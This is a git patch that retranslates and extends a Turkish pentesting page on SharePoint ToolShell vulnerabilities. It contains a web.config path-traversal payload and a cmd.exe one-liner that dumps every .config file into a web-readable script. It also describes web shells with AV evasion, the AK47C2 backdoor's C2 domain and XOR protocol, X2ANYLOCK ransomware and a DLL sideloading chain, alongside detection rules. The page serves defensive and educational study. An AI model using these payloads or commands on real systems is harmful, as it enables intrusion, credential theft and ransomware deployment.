From 6d1b3b32e714964d83b8bd920ef423a0968eda39 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Sun, 10 Aug 2025 18:32:28 +0000
Subject: [PATCH] Translated
 ['src/network-services-pentesting/pentesting-web/microsoft-sh

---
 .../pentesting-web/microsoft-sharepoint.md    | 74 ++++++++++++++++---
 1 file changed, 63 insertions(+), 11 deletions(-)

diff --git a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md
index 5eb26252f..6cb4752c6 100644
--- a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md
+++ b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md
@@ -47,14 +47,14 @@ ASP.NET ViewState'i kötüye kullanma hakkında derinlemesine bir açıklama iç
 
 ### 2.4 CVE-2025-53771 – Yol Traversali / web.config Açığa Çıkarma
 
-`ToolPane.aspx`'ye hazırlanmış bir `Source` parametresi göndermek (örneğin `../../../../web.config`), hedef dosyayı döndürerek aşağıdakilerin açığa çıkmasına izin verir:
+`ToolPane.aspx`'ye hazırlanmış bir `Source` parametresi göndermek (örneğin, `../../../../web.config`), hedef dosyayı döndürerek aşağıdakilerin açığa çıkmasına neden olur:
 
-* `<machineKey validationKey="…" decryptionKey="…">`  ➜ ViewState / ASPXAUTH çerezlerini sahte oluşturma
+* `<machineKey validationKey="…" decryptionKey="…">`  ➜ ViewState / ASPXAUTH çerezlerini sahtelemek
 * bağlantı dizeleri ve gizli anahtarlar.
 
-## 3. Gerçek hayatta gözlemlenen sonrası istismar tarifleri
+## 3. Post-exploitation tarifleri doğal ortamda gözlemlendi
 
-### 3.1 Her *.config* dosyasını dışarı aktar (varyasyon-1)
+### 3.1 Her *.config* dosyasını dışarıya aktar (varyasyon-1)
 ```
 cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"
 ```
@@ -79,23 +79,74 @@ Yazıldığı yer:
 ```
 C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
 ```
-Shell, çiftlik genelinde ViewState ve ASPXAUTH çerezlerini sahte olarak oluşturmayı sağlayan **makine anahtarlarını okuma / döndürme** uç noktalarını açığa çıkarır.
+The shell, makine anahtarlarını **okuma / döndürme** için uç noktaları açığa çıkarır, bu da ViewState ve ASPXAUTH çerezlerinin çiftlik genelinde sahte olarak oluşturulmasına olanak tanır.
 
 ### 3.3 Obfuscate edilmiş varyant (varyasyon-3)
 
 Aynı shell ama:
 * `...\15\TEMPLATE\LAYOUTS\` altına bırakıldı
-* değişken adları tek harfe indirildi
-* sandbox kaçışı ve zaman tabanlı AV atlatma için `Thread.Sleep(<ms>)` eklendi.
+* değişken adları tek harflerle azaltıldı
+* sandbox-kaçış ve zamanlama tabanlı AV atlatma için `Thread.Sleep(<ms>)` eklendi.
+
+### 3.4 AK47C2 çok protokollü arka kapı & X2ANYLOCK fidye yazılımı (gözlemlendi 2025-2026)
+
+Son olay müdahale araştırmaları (Unit42 “Proje AK47”) saldırganların **ilk RCE** sonrasında ToolShell zincirini nasıl kullandığını gösteriyor, SharePoint ortamlarında çift kanallı C2 implantı ve fidye yazılımı dağıtmak için:
+
+#### AK47C2 – `dnsclient` varyantı
+
+* Hard-coded DNS sunucusu: `10.7.66.10`, yetkili alan `update.updatemicfosoft.com` ile iletişim kuruyor.
+* Mesajlar, statik anahtar `VHBD@H` ile XOR şifrelenmiş JSON nesneleridir, hex kodlanmış ve **alt alan etiketleri** olarak gömülmüştür.
+
+```json
+{"cmd":"<COMMAND>","cmd_id":"<ID>"}
+```
+
+* Uzun sorgular parçalara ayrılır ve `s` ile ön eklenir, ardından sunucu tarafında yeniden birleştirilir.
+* Sunucu, aynı XOR/hex şemasını taşıyan TXT kayıtları ile yanıt verir:
+
+```json
+{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
+```
+* Versiyon 202504, `<COMMAND>::<SESSION_KEY>` ve parça işaretçileri `1`, `2`, `a` ile basitleştirilmiş bir format tanıttı.
+
+#### AK47C2 – `httpclient` varyantı
+
+* Tam olarak aynı JSON & XOR rutinini yeniden kullanır ancak hex blob'u **HTTP POST gövdesinde** `libcurl` aracılığıyla gönderir (`CURLOPT_POSTFIELDS`, vb.).
+* Aşağıdaki işlemleri/sonuçları sağlayan aynı görev/sonuç iş akışı:
+* Keyfi shell komut yürütme.
+* Dinamik uyku aralığı ve kill-switch talimatları.
+
+#### X2ANYLOCK fidye yazılımı
+
+* DLL yan yükleme aracılığıyla yüklenen 64-bit C++ yükü (aşağıya bakın).
+* Dosya verileri için AES-CBC ve AES anahtarını sarmak için RSA-2048 kullanır, ardından uzantıyı `.x2anylock` ekler.
+* Yerel sürücüleri ve keşfedilen SMB paylaşımlarını özyinelemeli olarak şifreler; sistem yollarını atlar.
+* Müzakere için statik **Tox ID** gömülü `How to decrypt my data.txt` açık metin notu bırakır.
+* İçinde bir **kill-switch** içerir:
+
+```c
+if (file_mod_time >= "2026-06-06") exit(0);
+```
+
+#### DLL yan yükleme zinciri
+
+1. Saldırgan, meşru bir `7z.exe` yanında `dllhijacked.dll`/`My7zdllhijacked.dll` yazar.
+2. SharePoint tarafından başlatılan `w3wp.exe`, Windows arama sırası nedeniyle kötü amaçlı DLL'yi yükleyen `7z.exe`'yi başlatır ve fidye yazılımı giriş noktasını bellekte çağırır.
+3. Ayrı bir LockBit yükleyici gözlemlendi (`bbb.msi` ➜ `clink_x86.exe` ➜ `clink_dll_x86.dll`), shell kodunu şifre çözer ve LockBit 3.0'ı çalıştırmak için `d3dl1.dll` içine **DLL hollowing** gerçekleştirir.
+
+> [!INFO]
+> X2ANYLOCK'ta bulunan aynı statik Tox ID, sızdırılan LockBit veritabanlarında görünmektedir, bu da ortaklık örtüşmesini önermektedir.
+
+---
 
 ## 4. Tespit fikirleri
 
 | Telemetri | Neden şüpheli |
-|-----------|----------------|
-| `w3wp.exe → cmd.exe`             | İşçi süreci nadiren shell açmalıdır  |
+|-----------|----------------------|
+| `w3wp.exe → cmd.exe`             | Çalışan süreç nadiren shell başlatmalıdır  |
 | `cmd.exe → powershell.exe -EncodedCommand` | Klasik lolbin deseni           |
-| `debug_dev.js` veya `spinstall0.aspx` oluşturan dosya olayları | ToolShell'den doğrudan IOC'ler |
-| `ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Modül günlükleri) | Kamuya açık PoC'ler bu sayfayı çağırır |
+| `debug_dev.js` veya `spinstall0.aspx` oluşturan dosya olayları | ToolShell'den doğrudan IOC'lar |
+| `ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Modül kayıtları) | Kamuya açık PoC'ler bu sayfayı çağırır |
 
 Örnek XDR / Sysmon kuralı (pseudo-XQL):
 ```
@@ -121,6 +172,7 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers
 - [Unit42 – Microsoft SharePoint Açıklarının Aktif İstismarı](https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/)
 - [GitHub PoC – ToolShell istismar zinciri](https://github.com/real-or-not/ToolShell)
 - [Microsoft Güvenlik Danışmanlığı – CVE-2025-49704 / 49706](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-49704)
+- [Unit42 – Proje AK47 / SharePoint İstismarı & Fidye Yazılımı Faaliyeti](https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/)
 - [Microsoft Güvenlik Danışmanlığı – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770)
 
 {{#include ../../banners/hacktricks-training.md}}